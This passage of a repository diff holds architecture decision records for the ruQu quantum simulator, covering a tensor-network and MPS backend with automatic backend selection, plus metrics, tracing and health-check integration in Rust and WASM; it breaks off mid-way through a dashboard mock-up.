### Risks
| Risk | Probability | Impact | Mitigation |
|------|------------|--------|------------|
| State vector memory limits simulation to d <= 3 | High | High | Stabilizer simulation fallback for d >= 5 |
| Mid-circuit measurement breaks SIMD optimization | Medium | Medium | Separate hot/cold paths, measurement is infrequent |
| Noise model too simplistic for real hardware | Medium | Medium | Support custom noise channels, correlated errors |
| Decoder latency dominates simulation time | Low | Medium | Use streaming decoder, pre-built matching graphs |
| Logical error tracking complexity for higher distance | Low | Low | Automate logical operator computation from layout |
### Trade-offs
| Decision | Advantage | Disadvantage |
|----------|-----------|--------------|
| State vector over stabilizer simulation | Handles arbitrary noise and non-Clifford ops | Exponential memory, limited to d <= 3-4 |
| Stochastic Pauli insertion for noise | Simple, exact for Pauli channels | Approximate for non-Pauli noise |
| Sequential ancilla measurement | Correct correlated outcomes | Cannot parallelize measurement step |
| Integration with existing ruQu decoder | Reuses battle-tested code | Decoder API may not perfectly match simulation needs |
| Coherent reset (amplitude transfer) | Preserves entanglement structure | More complex than incoherent reset |
---
## References
- Fowler, A.G. et al. "Surface codes: Towards practical large-scale quantum computation." Physical Review A 86, 032324 (2012)
- Dennis, E. et al. "Topological quantum memory." Journal of Mathematical Physics 43, 4452-4505 (2002)
- Google Quantum AI. "Suppressing quantum errors by scaling a surface code logical qubit." Nature 614, 676-681 (2023)
- Higgott, O. "PyMatching: A Python package for decoding quantum codes with minimum-weight perfect matching." ACM Transactions on Quantum Computing 3, 1-16 (2022)
- Wu, Y. & Lin, H.H. "Hypergraph Decomposition and Secret Sharing." Discrete Applied Mathematics (2024)
- ADR-001: ruQu Architecture - Classical Nervous System for Quantum Machines
- ADR-QE-005: VQE Algorithm Support (quantum state manipulation, expectation values)
- ADR-QE-006: Grover's Search (state vector operations, measurement)
- ruQu syndrome module: `crates/ruQu/src/syndrome.rs` - DetectorBitmap, SyndromeBuffer
- ruQu decoder module: `crates/ruQu/src/decoder.rs` - MWPMDecoder, fusion-blossom
- ruQu mincut module: `crates/ruQu/src/mincut.rs` - DynamicMinCutEngine
- ruQu filters module: `crates/ruQu/src/filters.rs` - Three-filter coherence pipeline
- ruvector-mincut crate: `crates/ruvector-mincut/` - El-Hayek/Henzinger/Li algorithm

View File

@@ -0,0 +1,480 @@
# ADR-QE-009: Tensor Network Evaluation Mode
**Status**: Proposed
**Date**: 2026-02-06
**Authors**: ruv.io, RuVector Team
**Deciders**: Architecture Review Board
---
## Context
Full state-vector simulation stores all 2^n complex amplitudes explicitly, yielding
O(2^n) memory and O(G * 2^n) time for G gates. At n=30 this is 16 GiB; at n=40 it
exceeds 16 TiB. Many practically interesting circuits, however, contain limited
entanglement:
| Circuit family | Entanglement structure | Treewidth |
|---|---|---|
| Shallow QAOA on sparse graphs | Bounded by graph degree | Low (often < 20) |
| Separate-register circuits | Disjoint qubit subsets | Sum of sub-widths |
| Near-Clifford circuits | Stabilizer + few T gates | Depends on T count |
| 1D brickwork (finite depth) | Area-law entanglement | O(depth) |
| Random deep circuits (all-to-all) | Volume-law entanglement | O(n) -- no gain |
For the first four families, tensor network (TN) methods can trade increased
computation for drastically reduced memory by representing each gate as a tensor and
contracting the resulting network in an optimized order. The contraction cost scales
exponentially in the *treewidth* of the circuit's line graph rather than in the total
qubit count.
QuantRS2 (the Rust quantum simulation reference) demonstrated tensor network
contraction for circuits up to 60 qubits on commodity hardware when treewidth
remained below ~25. ruVector's existing `ruvector-mincut` crate already solves graph
partitioning problems that are structurally identical to contraction-order
optimization, providing a natural integration point.
The ruQu engine needs this capability to support:
1. Surface code simulations at distance d >= 7 (49+ data qubits) for decoder
validation, where the syndrome extraction circuit is shallow and geometrically
local.
2. Variational algorithm prototyping (VQE, QAOA) on graphs larger than 30 nodes.
3. Hybrid workflows where part of the circuit is simulated via state vector and part
via tensor contraction.
## Decision
### 1. Feature-Gated Backend
Tensor network evaluation is implemented as an optional backend behind the
`tensor-network` feature flag in `ruqu-core`:
```toml
# ruqu-core/Cargo.toml
[features]
default = ["state-vector"]
state-vector = []
tensor-network = ["dep:ndarray", "dep:petgraph"]
all-backends = ["state-vector", "tensor-network"]
```
When both backends are compiled in, the engine selects the backend at runtime based
on circuit analysis (see Section 4 below).
### 2. Tensor Representation
Every gate becomes a tensor connecting the qubit wire indices it acts on:
| Gate type | Tensor rank | Shape | Example |
|---|---|---|---|
| Single-qubit (H, X, Rz, ...) | 2 | [2, 2] | Input wire -> output wire |
| Two-qubit (CNOT, CZ, ...) | 4 | [2, 2, 2, 2] | Two input wires -> two output wires |
| Three-qubit (Toffoli) | 6 | [2, 2, 2, 2, 2, 2] | Three input -> three output |
| Measurement projector | 2 | [2, 2] | Diagonal in computational basis |
| Initial state |0> | 1 | [2] | Single output wire |
The circuit is converted into a tensor network graph where:
- Each tensor is a node.
- Each shared index (qubit wire between consecutive gates) is an edge.
- Open indices represent initial states and final measurement outcomes.
```
|0>---[H]---[CNOT_ctrl]---[Rz]---<meas>
|
|0>-----------[CNOT_tgt]---------<meas>
```
Becomes:
```
Node: init_0 (rank 1)
|
Node: H_0 (rank 2)
|
Node: CNOT_01 (rank 4)
/ \
| Node: Rz_0 (rank 2)
| |
| Node: meas_0 (rank 2)
|
Node: init_1 (rank 1)
... (connected via CNOT shared index)
Node: meas_1 (rank 2)
```
### 3. Contraction Strategy
Contraction order determines whether the computation is tractable. The cost of
contracting two tensors is the product of the dimensions of all indices involved.
Finding the optimal contraction order is NP-hard (equivalent to finding minimum
treewidth), so we use heuristics.
#### Contraction Path Optimization Pseudocode
```
function find_contraction_path(tensor_network: TN) -> ContractionPath:
// Phase 1: Simplify the network
apply_trivial_contractions(tensor_network) // rank-1 tensors, diagonal pairs
// Phase 2: Detect community structure
communities = detect_communities(tensor_network.graph)
// Phase 3: Contract within communities first (small subproblems)
intra_paths = []
for community in communities:
subgraph = tensor_network.subgraph(community)
if subgraph.num_tensors <= 20:
// Exact dynamic programming for small subgraphs
path = optimal_einsum_dp(subgraph)
else:
// Greedy with lookahead for larger subgraphs
path = greedy_with_lookahead(subgraph, lookahead=2)
intra_paths.append(path)
// Phase 4: Contract inter-community edges
// Each community is now a single large tensor
meta_graph = contract_communities(tensor_network, intra_paths)
inter_path = greedy_with_lookahead(meta_graph, lookahead=3)
// Phase 5: Compose the full path
return compose_paths(intra_paths, inter_path)
function greedy_with_lookahead(tn: TN, lookahead: int) -> Path:
path = []
remaining = tn.clone()
while remaining.num_tensors > 1:
best_cost = INFINITY
best_pair = None
// Evaluate all candidate contractions
for (i, j) in remaining.candidate_pairs():
cost = contraction_cost(remaining, i, j)
// Lookahead: estimate cost of subsequent contractions
if lookahead > 0:
simulated = remaining.simulate_contraction(i, j)
future_cost = estimate_future_cost(simulated, lookahead - 1)
cost += future_cost * DISCOUNT_FACTOR
if cost < best_cost:
best_cost = cost
best_pair = (i, j)
path.append(best_pair)
remaining.contract(best_pair)
return path
```
#### Community Detection via ruvector-mincut
The `ruvector-mincut` crate provides graph partitioning that is directly applicable
to contraction ordering:
```rust
use ruvector_mincut::{partition, PartitionConfig};
fn partition_tensor_network(tn: &TensorNetwork) -> Vec<Vec<TensorId>> {
let graph = tn.to_adjacency_graph();
let config = PartitionConfig {
num_partitions: estimate_optimal_partitions(tn),
balance_factor: 1.1, // Allow 10% imbalance
minimize: Objective::EdgeCut, // Minimize inter-partition wires
};
partition(&graph, &config)
}
```
The edge cut directly corresponds to the bond dimension of the inter-community
contraction, so minimizing edge cut minimizes the most expensive contraction step.
### 4. MPS (Matrix Product State) Mode
For circuits with 1D-like connectivity (nearest-neighbor gates on a line), a Matrix
Product State representation is more efficient than general tensor contraction.
```
A[1] -- A[2] -- A[3] -- ... -- A[n]
| | | |
phys_1 phys_2 phys_3 phys_n
```
Each site tensor A[i] has shape `[bond_left, physical, bond_right]` where:
- `physical` = 2 (qubit dimension)
- `bond_left`, `bond_right` = bond dimension chi
| Bond dimension (chi) | Memory per site | Total memory (n qubits) | Approximation |
|---|---|---|---|
| 1 | 16 bytes | 16n bytes | Product state only |
| 16 | 4 KiB | 4n KiB | Low entanglement |
| 64 | 64 KiB | 64n KiB | Moderate entanglement |
| 256 | 1 MiB | n MiB | High entanglement |
| 1024 | 16 MiB | 16n MiB | Near exact for many circuits |
**Truncation policy**: After each two-qubit gate, perform SVD on the updated bond.
If the bond dimension exceeds `chi_max`, truncate the smallest singular values.
Track the total discarded weight (sum of squared discarded singular values) as a
fidelity estimate:
```rust
pub struct MpsConfig {
/// Maximum bond dimension. Truncation occurs above this.
pub chi_max: usize,
/// Minimum singular value to retain (relative to largest).
pub svd_cutoff: f64,
/// Accumulated truncation error (updated during simulation).
pub fidelity_estimate: f64,
}
impl Default for MpsConfig {
fn default() -> Self {
Self {
chi_max: 256,
svd_cutoff: 1e-12,
fidelity_estimate: 1.0,
}
}
}
```
### 5. Automatic Mode Selection
The engine analyzes the circuit before execution to recommend a backend:
```rust
pub enum RecommendedBackend {
StateVector { reason: &'static str },
TensorNetwork { estimated_treewidth: usize, reason: &'static str },
Mps { estimated_max_bond: usize, reason: &'static str },
}
pub fn recommend_backend(circuit: &QuantumCircuit) -> RecommendedBackend {
let n = circuit.num_qubits();
let depth = circuit.depth();
let connectivity = circuit.connectivity_graph();
// Rule 1: Small circuits always use state vector
if n <= 20 {
return RecommendedBackend::StateVector {
reason: "Small circuit; state vector is fastest below 20 qubits",
};
}
// Rule 2: Check for 1D connectivity (MPS candidate)
if connectivity.max_degree() <= 2 && connectivity.is_path_graph() {
let estimated_bond = 2_usize.pow(depth.min(20) as u32);
return RecommendedBackend::Mps {
estimated_max_bond: estimated_bond,
reason: "1D nearest-neighbor connectivity detected",
};
}
// Rule 3: Estimate treewidth for general TN
let estimated_tw = estimate_treewidth(&connectivity, depth);
if estimated_tw < 25 && n > 25 {
return RecommendedBackend::TensorNetwork {
estimated_treewidth: estimated_tw,
reason: "Low treewidth relative to qubit count",
};
}
// Rule 4: Check memory feasibility for state vector
let sv_memory = 16 * (1_usize << n); // bytes
let available = estimate_available_memory();
if sv_memory > available {
// Force TN even if treewidth is high -- at least it has a chance
return RecommendedBackend::TensorNetwork {
estimated_treewidth: estimated_tw,
reason: "State vector exceeds available memory; TN is only option",
};
}
RecommendedBackend::StateVector {
reason: "High treewidth circuit; state vector is more efficient",
}
}
```
### 6. When Tensor Networks Win vs Lose
**Tensor networks win when:**
| Scenario | Why TN wins | Example |
|---|---|---|
| Shallow circuits on many qubits | Treewidth ~ depth, not n | 50-qubit depth-4 QAOA |
| Sparse graph connectivity | Low treewidth from graph structure | MaxCut on 3-regular graph |
| Separate registers | Independent contractions | n/2 Bell pairs |
| Near-Clifford | Stabilizer + few non-Clifford gates | Clifford + 5 T gates |
| Amplitude computation | Contract to single output, not full state | Sampling one bitstring |
**Tensor networks lose when:**
| Scenario | Why TN loses | Fallback |
|---|---|---|
| Deep random circuits | Treewidth ~ n | State vector (if n <= 30) |
| All-to-all connectivity | No structure to exploit | State vector |
| Full state tomography needed | Must contract once per amplitude | State vector |
| Very small circuits (n < 20) | Overhead exceeds state vector | State vector |
| High-fidelity MPS needed | Bond dimension grows exponentially | State vector or exact TN |
### 7. Example: 50-Qubit Shallow QAOA
Consider QAOA depth p=1 on a 50-node 3-regular graph:
```
Circuit structure:
- 50 qubits, initialized to |+>
- 75 ZZ gates (one per edge), parameterized by gamma
- 50 Rx gates, parameterized by beta
- Total: 125 + 50 = 175 gates
- Circuit depth: 4 (H layer, ZZ layer (3-colorable), Rx layer, measure)
Graph treewidth of 3-regular graph: typically 8-15
Tensor network contraction:
- Community detection finds ~5-8 communities of 6-10 nodes
- Intra-community contraction: O(2^10) ~ 1024 per community
- Inter-community bonds: ~15 edges cut
- Effective contraction complexity: O(2^15) = 32768
- Compare to state vector: O(2^50) = 1.1 * 10^15
Memory comparison:
- State vector: 2^50 * 16 bytes = 16 PiB (impossible)
- Tensor network: ~100 MiB working memory
- Speedup factor: practically infinite (feasible vs infeasible)
```
```
Contraction Diagram (simplified):
Community A Community B Community C
[q0-q9] [q10-q19] [q20-q29]
| | |
+--- bond=2^3 ----+---- bond=2^4 -----+
|
Community D Community E
[q30-q39] [q40-q49]
| |
+--- bond=2^3 ----+
Peak intermediate tensor: 2^15 elements = 512 KiB
```
### 8. Integration with State Vector Backend
Both backends implement the same trait:
```rust
pub trait SimulationBackend {
/// Execute the circuit and return measurement results.
fn execute(
&self,
circuit: &QuantumCircuit,
shots: usize,
config: &SimulationConfig,
) -> Result<SimulationResult, SimulationError>;
/// Compute expectation value of an observable.
fn expectation_value(
&self,
circuit: &QuantumCircuit,
observable: &Observable,
config: &SimulationConfig,
) -> Result<f64, SimulationError>;
/// Return the backend name for logging.
fn name(&self) -> &'static str;
}
```
Users interact through `QuantumCircuit` and never need to know which backend is
active:
```rust
let circuit = QuantumCircuit::new(50)
.h_all()
.append_qaoa_layer(graph, gamma, beta)
.measure_all();
// Automatic backend selection
let result = ruqu::execute(&circuit, 1000)?;
// -> Internally selects TensorNetwork backend due to n=50, low treewidth
// Or explicit backend override
let result = ruqu::execute_with_backend(
&circuit,
1000,
Backend::TensorNetwork(TnConfig::default()),
)?;
```
### 9. Future: ruvector-mincut Integration for Contraction Ordering
The `ruvector-mincut` crate currently solves balanced graph partitioning for vector
index sharding. The same algorithm directly applies to tensor network contraction
ordering via the following correspondence:
| Graph partitioning concept | TN contraction concept |
|---|---|
| Vertex | Tensor |
| Edge weight | Bond dimension (log2) |
| Partition | Contraction subtree |
| Edge cut | Inter-partition bond cost |
| Balanced partition | Balanced contraction tree |
Phase 1 (this ADR): Use `ruvector-mincut` for community detection in contraction
path optimization.
Phase 2 (future): Extend `ruvector-mincut` with hypergraph partitioning for
multi-index tensor contractions, enabling handling of higher-order tensor networks
(e.g., PEPS for 2D circuits).
## Consequences
### Positive
1. **Dramatically expanded qubit range**: Shallow circuits on 40-60 qubits become
tractable on commodity hardware.
2. **Surface code simulation**: Distance-7 surface codes (49 data + 48 ancilla = 97
qubits) can be simulated for decoder validation using MPS (the circuit is
geometrically local).
3. **Unified interface**: Users write circuits once; backend selection is automatic.
4. **Synergy with ruvector-mincut**: Leverages existing graph partitioning
investment.
5. **Complementary to state vector**: Each backend covers the other's weakness.
### Negative
1. **Implementation complexity**: Tensor contraction, SVD truncation, and path
optimization are non-trivial to implement correctly and efficiently.
2. **Approximation risk**: MPS truncation introduces controlled but nonzero error.
Users must understand fidelity estimates.
3. **Compilation time**: The `ndarray` and `petgraph` dependencies add to compile
time when the feature is enabled.
4. **Testing surface**: Two backends doubles the testing matrix for correctness
validation.
5. **Performance unpredictability**: Contraction cost depends on circuit structure
in ways that are hard to predict without running the path optimizer.
### Risks and Mitigations
| Risk | Likelihood | Impact | Mitigation |
|---|---|---|---|
| Path optimizer finds poor ordering | Medium | High cost | Multiple heuristics + timeout fallback to greedy |
| MPS fidelity silently degrades | Medium | Incorrect results | Track discarded weight; warn if fidelity < 0.99 |
| Feature interaction bugs | Low | Incorrect results | Shared test suite: both backends must agree on small circuits |
| Memory spike during contraction | Medium | OOM | Pre-estimate peak intermediate tensor size; abort if too large |
## References
- QuantRS2 tensor network implementation: internal reference
- Markov & Shi, "Simulating Quantum Computation by Contracting Tensor Networks" (2008)
- Gray & Kourtis, "Hyper-optimized tensor network contraction" (2021) -- cotengra
- Schollwock, "The density-matrix renormalization group in the age of matrix product states" (2011)
- ADR-QE-001: Core Engine Architecture (state vector backend)
- ADR-QE-005: WASM Compilation Target
- `ruvector-mincut` crate documentation
- ADR-014: Coherence Engine (graph partitioning reuse)

View File

@@ -0,0 +1,689 @@
# ADR-QE-010: Observability & Monitoring Integration
**Status**: Proposed
**Date**: 2026-02-06
**Authors**: ruv.io, RuVector Team
**Deciders**: Architecture Review Board
---
## Context
ruVector provides comprehensive observability through the `ruvector-metrics` crate,
which aggregates telemetry from all subsystems into a unified monitoring dashboard.
The quantum simulation engine is a new subsystem that must participate in this
observability infrastructure.
Effective monitoring of quantum simulation is essential for:
1. **Performance tuning**: Identifying bottlenecks in gate application, memory
allocation, and parallelization efficiency.
2. **Resource management**: Tracking memory consumption to prevent OOM conditions
and to inform auto-scaling decisions.
3. **Debugging**: Tracing the execution of specific circuits to diagnose incorrect
results or unexpected behavior.
4. **Capacity planning**: Understanding workload patterns (qubit counts, circuit
depths, simulation frequency) to plan infrastructure.
5. **Compliance**: Auditable logs of simulation executions for regulated
environments (cryptographic validation, safety-critical applications).
### WASM Constraint
In WebAssembly deployment, there is no direct filesystem access and no native
networking. Observability in WASM must use browser-compatible mechanisms:
`console.log`, `console.warn`, `console.error`, or JavaScript callback functions
registered by the host application.
### Existing Infrastructure
| Component | Role | Integration Point |
|---|---|---|
| `ruvector-metrics` | Metrics aggregation and export | Trait-based sink |
| `ruvector-monitor` | Real-time dashboard UI | WebSocket feed |
| Rust `tracing` crate | Structured logging and spans | Subscriber-based |
| Prometheus / OpenTelemetry | External monitoring | Exporter plugins |
| Ed25519 audit trail | Cryptographic logging | `ruqu-audit` crate |
## Decision
### 1. Metrics Schema
Every simulation execution emits a structured metrics record. The schema is
versioned to allow evolution without breaking consumers.
```rust
/// Metrics emitted after each quantum simulation execution.
/// Schema version: 1.0.0
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct SimulationMetrics {
/// Schema version for forward compatibility.
pub schema_version: &'static str,
/// Unique identifier for this simulation run.
pub simulation_id: Uuid,
/// Timestamp when simulation started (UTC).
pub started_at: DateTime<Utc>,
/// Timestamp when simulation completed (UTC).
pub completed_at: DateTime<Utc>,
// -- Circuit characteristics --
/// Number of qubits in the circuit.
pub qubit_count: u32,
/// Total number of gates (before optimization).
pub gate_count_raw: u64,
/// Total number of gates (after optimization/fusion).
pub gate_count_optimized: u64,
/// Circuit depth (longest path from input to output).
pub circuit_depth: u32,
/// Number of two-qubit gates (entangling operations).
pub two_qubit_gate_count: u64,
// -- Execution metrics --
/// Total wall-clock execution time in milliseconds.
pub execution_time_ms: f64,
/// Time spent in gate application (excluding allocation, measurement).
pub gate_application_time_ms: f64,
/// Time spent in measurement sampling.
pub measurement_time_ms: f64,
/// Peak memory consumption in bytes during simulation.
pub peak_memory_bytes: u64,
/// Memory allocated for the state vector / tensor network.
pub state_memory_bytes: u64,
/// Backend used for this simulation.
pub backend: BackendType,
// -- Throughput --
/// Gates applied per second (optimized gate count / gate application time).
pub gates_per_second: f64,
/// Qubits * depth per second (a normalized throughput metric).
pub quantum_volume_rate: f64,
// -- Optimization statistics --
/// Number of gates eliminated by fusion.
pub gates_fused: u64,
/// Number of gates eliminated as identity or redundant.
pub gates_skipped: u64,
/// Number of gate commutations applied.
pub gates_commuted: u64,
// -- Entanglement analysis --
/// Number of independent qubit subsets (entanglement groups).
pub entanglement_groups: u32,
/// Sizes of each entanglement group.
pub entanglement_group_sizes: Vec<u32>,
// -- Measurement outcomes (if measured) --
/// Number of measurement shots executed.
pub measurement_shots: Option<u64>,
/// Distribution entropy of measurement outcomes (bits).
pub outcome_entropy: Option<f64>,
// -- MPS-specific (tensor network backend) --
/// Maximum bond dimension reached (MPS mode only).
pub max_bond_dimension: Option<u32>,
/// Estimated fidelity after MPS truncation.
pub mps_fidelity_estimate: Option<f64>,
// -- Error information --
/// Whether the simulation completed successfully.
pub success: bool,
/// Error message if simulation failed.
pub error: Option<String>,
/// Error category for programmatic handling.
pub error_kind: Option<SimulationErrorKind>,
}
#[derive(Debug, Clone, Serialize, Deserialize)]
pub enum BackendType {
StateVector,
TensorNetwork,
Mps,
Hybrid,
}
#[derive(Debug, Clone, Serialize, Deserialize)]
pub enum SimulationErrorKind {
QubitLimitExceeded,
MemoryAllocationFailed,
InvalidGateTarget,
InvalidParameter,
ContractionFailed,
MpsFidelityBelowThreshold,
Timeout,
InternalError,
}
```
### 2. Metrics Sink Trait
The engine publishes metrics through a trait abstraction, allowing different sinks
for native and WASM environments:
```rust
/// Trait for consuming simulation metrics.
/// Implementations exist for native (ruvector-metrics), WASM (JS callback),
/// and testing (in-memory collector).
pub trait MetricsSink: Send + Sync {
/// Publish a completed simulation's metrics.
fn publish(&self, metrics: &SimulationMetrics);
/// Publish an incremental progress update (for long-running simulations).
fn progress(&self, simulation_id: Uuid, percent_complete: f32, message: &str);
/// Publish a health status update.
fn health(&self, status: EngineHealthStatus);
}
/// Native implementation: forwards to ruvector-metrics.
pub struct NativeMetricsSink {
registry: Arc<ruvector_metrics::Registry>,
}
impl MetricsSink for NativeMetricsSink {
fn publish(&self, metrics: &SimulationMetrics) {
// Emit as histogram/counter/gauge values
self.registry.histogram("ruqu.execution_time_ms")
.record(metrics.execution_time_ms);
self.registry.gauge("ruqu.peak_memory_bytes")
.set(metrics.peak_memory_bytes as f64);
self.registry.counter("ruqu.simulations_total")
.increment(1);
self.registry.counter("ruqu.gates_applied_total")
.increment(metrics.gate_count_optimized);
self.registry.histogram("ruqu.gates_per_second")
.record(metrics.gates_per_second);
if !metrics.success {
self.registry.counter("ruqu.errors_total")
.increment(1);
}
}
fn progress(&self, _id: Uuid, percent: f32, _msg: &str) {
self.registry.gauge("ruqu.current_progress")
.set(percent as f64);
}
fn health(&self, status: EngineHealthStatus) {
self.registry.gauge("ruqu.health_status")
.set(status.as_numeric());
}
}
```
### 3. WASM Metrics Sink
In WASM, metrics are delivered via JavaScript callbacks:
```rust
#[cfg(target_arch = "wasm32")]
pub struct WasmMetricsSink {
/// JS callback function registered by host application.
callback: js_sys::Function,
}
#[cfg(target_arch = "wasm32")]
impl MetricsSink for WasmMetricsSink {
fn publish(&self, metrics: &SimulationMetrics) {
let json = serde_json::to_string(metrics)
.unwrap_or_else(|_| "{}".to_string());
let js_value = JsValue::from_str(&json);
let event_type = JsValue::from_str("simulation_complete");
let _ = self.callback.call2(&JsValue::NULL, &event_type, &js_value);
}
fn progress(&self, id: Uuid, percent: f32, message: &str) {
let payload = format!(
r#"{{"simulation_id":"{}","percent":{},"message":"{}"}}"#,
id, percent, message
);
let js_value = JsValue::from_str(&payload);
let event_type = JsValue::from_str("simulation_progress");
let _ = self.callback.call2(&JsValue::NULL, &event_type, &js_value);
}
fn health(&self, status: EngineHealthStatus) {
let payload = format!(r#"{{"status":"{}"}}"#, status.as_str());
let js_value = JsValue::from_str(&payload);
let event_type = JsValue::from_str("engine_health");
let _ = self.callback.call2(&JsValue::NULL, &event_type, &js_value);
}
}
```
JavaScript host registration:
```javascript
// Host application registers the metrics callback
import init, { set_metrics_callback } from 'ruqu-wasm';
await init();
set_metrics_callback((eventType, data) => {
const metrics = JSON.parse(data);
switch (eventType) {
case 'simulation_complete':
console.log(`Simulation ${metrics.simulation_id} completed in ${metrics.execution_time_ms}ms`);
dashboard.updateMetrics(metrics);
break;
case 'simulation_progress':
progressBar.update(metrics.percent);
break;
case 'engine_health':
healthIndicator.set(metrics.status);
break;
}
});
```
### 4. Tracing Integration
The engine integrates with the Rust `tracing` crate for structured logging and
distributed tracing.
#### Span Hierarchy
```
ruqu::simulation (root span for entire simulation)
|
+-- ruqu::circuit_validation (validate circuit structure)
|
+-- ruqu::backend_selection (automatic backend choice)
|
+-- ruqu::optimization (gate fusion, commutation, etc.)
| |
| +-- ruqu::optimization::fusion (individual fusion passes)
| +-- ruqu::optimization::cancel (gate cancellation)
|
+-- ruqu::state_init (allocate and initialize state)
|
+-- ruqu::gate_application (apply all gates)
| |
| +-- ruqu::gate (individual gate -- DEBUG level only)
|
+-- ruqu::measurement (perform measurement sampling)
|
+-- ruqu::metrics_publish (emit metrics to sink)
|
+-- ruqu::state_cleanup (deallocate state vector)
```
#### Instrumentation Code
```rust
use tracing::{info, warn, debug, trace, instrument, Span};
#[instrument(
name = "ruqu::simulation",
skip(circuit, config, metrics_sink),
fields(
qubit_count = circuit.num_qubits(),
gate_count = circuit.gate_count(),
simulation_id = %Uuid::new_v4(),
)
)]
pub fn execute(
circuit: &QuantumCircuit,
shots: usize,
config: &SimulationConfig,
metrics_sink: &dyn MetricsSink,
) -> Result<SimulationResult, SimulationError> {
info!(
qubits = circuit.num_qubits(),
gates = circuit.gate_count(),
depth = circuit.depth(),
shots = shots,
"Starting quantum simulation"
);
// Validate
let _validation_span = tracing::info_span!("ruqu::circuit_validation").entered();
validate_circuit(circuit)?;
drop(_validation_span);
// Select backend
let _backend_span = tracing::info_span!("ruqu::backend_selection").entered();
let backend = select_backend(circuit, config);
info!(backend = backend.name(), "Backend selected");
drop(_backend_span);
// Optimize
let _opt_span = tracing::info_span!("ruqu::optimization").entered();
let optimized = optimize_circuit(circuit, config)?;
info!(
original_gates = circuit.gate_count(),
optimized_gates = optimized.gate_count(),
gates_fused = circuit.gate_count() - optimized.gate_count(),
"Circuit optimization complete"
);
drop(_opt_span);
// Execute
let result = backend.execute(&optimized, shots, config)?;
// At DEBUG level, log per-gate details
debug!(
execution_time_ms = result.execution_time_ms,
peak_memory = result.peak_memory_bytes,
"Simulation execution complete"
);
// At TRACE level only for small circuits, log amplitude information
if circuit.num_qubits() <= 10 {
trace!(
amplitudes = ?result.state_vector_snapshot(),
"Final state vector (small circuit trace)"
);
}
Ok(result)
}
```
### 5. Structured Error Reporting
All errors carry structured context for programmatic handling:
```rust
#[derive(Debug, thiserror::Error)]
pub enum SimulationError {
#[error("Qubit limit exceeded: requested {requested}, maximum {maximum}")]
QubitLimitExceeded {
requested: u32,
maximum: u32,
estimated_memory_bytes: u64,
available_memory_bytes: u64,
},
#[error("Memory allocation failed for {requested_bytes} bytes")]
MemoryAllocationFailed {
requested_bytes: u64,
qubit_count: u32,
suggestion: &'static str,
},
#[error("Invalid gate target: qubit {qubit} in {qubit_count}-qubit circuit")]
InvalidGateTarget {
gate_name: String,
qubit: u32,
qubit_count: u32,
gate_index: usize,
},
#[error("Invalid gate parameter: {parameter_name} = {value} ({reason})")]
InvalidParameter {
gate_name: String,
parameter_name: String,
value: f64,
reason: &'static str,
},
#[error("Tensor contraction failed: {reason}")]
ContractionFailed {
reason: String,
estimated_treewidth: usize,
suggestion: &'static str,
},
#[error("MPS fidelity {fidelity:.6} below threshold {threshold:.6}")]
MpsFidelityBelowThreshold {
fidelity: f64,
threshold: f64,
max_bond_dimension: usize,
suggestion: &'static str,
},
#[error("Simulation timed out after {elapsed_ms}ms (limit: {timeout_ms}ms)")]
Timeout {
elapsed_ms: u64,
timeout_ms: u64,
gates_completed: u64,
gates_remaining: u64,
},
#[error("Internal error: {message}")]
InternalError {
message: String,
source: Option<Box<dyn std::error::Error + Send + Sync>>,
},
}
```
Each error variant includes a `suggestion` field where applicable, guiding users
toward resolution:
| Error | Suggestion |
|---|---|
| QubitLimitExceeded | "Reduce qubit count or enable tensor-network feature for large circuits" |
| MemoryAllocationFailed | "Try tensor-network backend or reduce qubit count by 1-2 (halves/quarters memory)" |
| ContractionFailed | "Circuit treewidth too high for tensor network; use state vector for <= 30 qubits" |
| MpsFidelityBelowThreshold | "Increase chi_max or switch to exact state vector for high-fidelity results" |
### 6. Health Checks
The engine exposes health status for monitoring systems:
```rust
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct EngineHealthStatus {
/// Whether the engine is ready to accept simulations.
pub ready: bool,
/// Maximum qubits supportable given current available memory.
pub max_supported_qubits: u32,
/// Available memory in bytes.
pub available_memory_bytes: u64,
/// Number of CPU cores available for parallel gate application.
pub available_cores: usize,
/// Whether the tensor-network backend is compiled in.
pub tensor_network_available: bool,
/// Current engine version.
pub version: &'static str,
/// Uptime since engine initialization (if applicable).
pub uptime_seconds: Option<f64>,
/// Number of simulations executed in current session.
pub simulations_executed: u64,
/// Total gates applied across all simulations in current session.
pub total_gates_applied: u64,
}
/// Check engine health. Callable at any time.
pub fn quantum_engine_ready() -> EngineHealthStatus {
let available_memory = estimate_available_memory();
let max_qubits = compute_max_qubits(available_memory);
EngineHealthStatus {
ready: max_qubits >= 4, // Minimum useful simulation
max_supported_qubits: max_qubits,
available_memory_bytes: available_memory,
available_cores: rayon::current_num_threads(),
tensor_network_available: cfg!(feature = "tensor-network"),
version: env!("CARGO_PKG_VERSION"),
uptime_seconds: None, // Library mode; no persistent uptime
simulations_executed: SESSION_COUNTER.load(Ordering::Relaxed),
total_gates_applied: SESSION_GATES.load(Ordering::Relaxed),
}
}
```
### 7. Logging Levels
| Level | Content | Audience | Performance Impact |
|---|---|---|---|
| ERROR | Simulation failures, OOM, invalid circuits | Operators, alerting | None |
| WARN | Approaching memory limits (>80%), MPS fidelity degradation, slow contraction | Operators | Negligible |
| INFO | Simulation start/end summaries, backend selection, optimization results | Developers, dashboards | Negligible |
| DEBUG | Per-optimization-pass details, memory allocation sizes, thread utilization | Developers debugging | Low |
| TRACE | Per-gate amplitude changes (small circuits only, n <= 10), SVD singular values | Deep debugging | High (small circuits only) |
TRACE level is gated on circuit size to prevent catastrophic log volume:
```rust
// TRACE-level amplitude logging is only emitted for circuits with <= 10 qubits.
// For larger circuits, TRACE only emits gate-level timing without amplitude data.
if tracing::enabled!(tracing::Level::TRACE) {
if circuit.num_qubits() <= 10 {
trace!(amplitudes = ?state.as_slice(), "Post-gate state");
} else {
trace!(gate_time_ns = elapsed.as_nanos(), "Gate applied");
}
}
```
### 8. Dashboard Integration
Metrics from the quantum engine appear in the ruVector monitoring UI as a dedicated
panel alongside vector operations, index health, and system resources.
```
+------------------------------------------------------------------+
| ruVector Monitoring Dashboard |
+------------------------------------------------------------------+
| |
| Vector Operations | Quantum Simulations |
| ------------------- | ----------------------- |
| Queries/sec: 12,450 | Simulations/min: 23 |
| P99 latency: 2.3ms | Avg execution: 145ms |
| Index size: 2.1M vectors | Avg qubits: 18.4 |
| | Peak memory: 4.2 GiB |
| | Backend: SV 87% / TN 13% |
| | Gates/sec: 2.1B |
| | Error rate: 0.02% |
| | |
| System Resources | Recent Simulations |
